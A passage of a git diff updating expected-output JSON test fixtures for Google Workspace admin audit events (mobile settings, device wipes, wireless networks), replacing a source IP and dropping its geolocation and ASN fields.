+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
"provider": "admin",
"action": "CHANGE_MOBILE_SETTING",
"id": "1", @@ -1498,7 +1174,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1522,35 +1198,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821667Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977526700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_ADMIN_RESTRICTIONS_PIN", "id": "1", @@ -1580,7 +1238,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1604,35 +1262,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821668900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977532400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
"provider": "admin",
"action": "CHANGE_MOBILE_WIRELESS_NETWORK",
"id": "1",
@@ -1662,7 +1302,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1686,35 +1326,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821670900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977538100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
"provider": "admin",
"action": "ADD_MOBILE_WIRELESS_NETWORK",
"id": "1",
@@ -1744,7 +1366,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1768,35 +1390,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821672800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977559600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
"provider": "admin",
"action": "REMOVE_MOBILE_WIRELESS_NETWORK",
"id": "1",
@@ -1826,7 +1430,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1850,35 +1454,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821674700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977649400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
"provider": "admin",
"action": "CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD",
"id": "1",
@@ -1908,7 +1494,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1932,35 +1518,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821676800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977654100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
"provider": "admin",
"action": "REMOVE_MOBILE_CERTIFICATE",
"id": "1",
@@ -1990,7 +1558,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -2009,35 +1577,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821678700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}",
+ "ingested": "2021-12-09T13:38:46.977657600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}",
"provider": "admin",
"action": "ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT",
"id": "1",
@@ -2067,7 +1617,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -2086,35 +1636,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821680600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}",
+ "ingested": "2021-12-09T13:38:46.977661800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}",
"provider": "admin",
"action": "USE_GOOGLE_MOBILE_MANAGEMENT",
"id": "1",
@@ -2144,7 +1676,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -2163,35 +1695,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821682500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}",
+ "ingested": "2021-12-09T13:38:46.977665700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}",
"provider": "admin",
"action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS",
"id": "1",
@@ -2221,7 +1735,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -2240,35 +1754,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821684400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}", + "ingested": "2021-12-09T13:38:46.977670200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}", "provider": "admin", "action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS", "id": "1", @@ -2298,7 +1794,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2322,35 +1818,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821686300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977675400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_ACCOUNT_WIPE", "id": "1", @@ -2381,7 +1859,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2405,35 +1883,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821688200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977680700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE", "id": "1", @@ -2464,7 +1924,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2488,35 +1948,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821690100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977686Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK", "id": "1", 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log
index 3ad1efedd6a..0a2ae8ad792 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log
@@ -1,17 +1,17 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
